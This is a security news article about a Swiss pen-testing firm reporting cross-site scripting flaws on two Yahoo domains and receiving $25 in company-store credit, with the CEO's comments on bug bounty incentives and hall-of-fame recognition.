Researchers report XSS flaws to Yahoo, receive $25 store credit as bug bounty

Share this article:

A Swiss penetration testing firm that pointed out cross-site scripting (XSS) flaws affecting two Yahoo domains was disappointed to discover the company's reward for their research.

According to High-Tech Bridge, Yahoo shelled out $12.50 each for two bugs it reported to the firm, which previously found XSS bugs in NASDAQ's website. Furthermore, the money was only redeemable if used at Yahoo's company store, High-Tech Bridge revealed in a Monday blog post.

The XSS flaws, which affected the ecom.yahoo.com and adserver.yahoo.com domains, could allow any "@Yahoo.com" email account to be compromised if a logged-in user clicked a malicious link sent by a saboteur, the company revealed.

SCMagazine.com reached out to Yahoo, but did not immediately hear back.

Three XSS bugs were reported to Yahoo as of Sept. 23, and the company responded within 48 hours, offering $12.50 each for just two of the bugs. All of the vulnerabilities have since been patched by Yahoo, High-Tech Bridge said.

The company discovered the XSS flaw after beginning an experiment to see “how quickly security vulnerabilities on well-known websites such as Yahoo can be found” – and how long it would take to receive a response, the company blog post said.

In a Tuesday email, IIia Kolochenko, CEO at High-Tech Bridge, told SCMagazine.com that even without sufficient financial motivation, companies could do a better job of providing other incentives for security researchers reporting their discoveries.

"Few companies today pay enough money to security researchers to motivate them only by money," Kolochenko wrote. "Even the amounts paid by Google are not high enough to be a sole motivation for researchers. However, when a company also offers a public 'thank you,' such as listing in [a] hall of fame, it can be a good added-value for many security professionals."

Kolochenko told SCMagazine.com that he inquired about a program that recognized researchers' findings. Yahoo's security team emailed him back saying they did not have a hall of fame program, but that things could change in the future.

Share this article:

Sign up to our newsletters

More in News

Brazilian president signs internet 'Bill of Rights' into law

Brazilian president signs internet 'Bill of Rights' into ...

President Dilma Rousseff signed the legislation on Wednesday at the NetMundial conference in Sao Paulo.

Android trojan sends premium SMS messages, targets U.S. users for first time

Android trojan sends premium SMS messages, targets U.S. ...

An SMS trojan for Android, known as FakeInst, has been observed sending premium SMS messages to users all over the world, including, for the first time, the United States.

Report: DDoS up in Q4 2013, vulnerability scanners leveraged to exploit sites

Report: DDoS up in Q4 2013, vulnerability scanners ...

Researchers observed 346 DDoS attacks in the final quarter of 2013 and attackers used Vega and Skipfish vulnerability scanners to exploit web flaws at financial companies.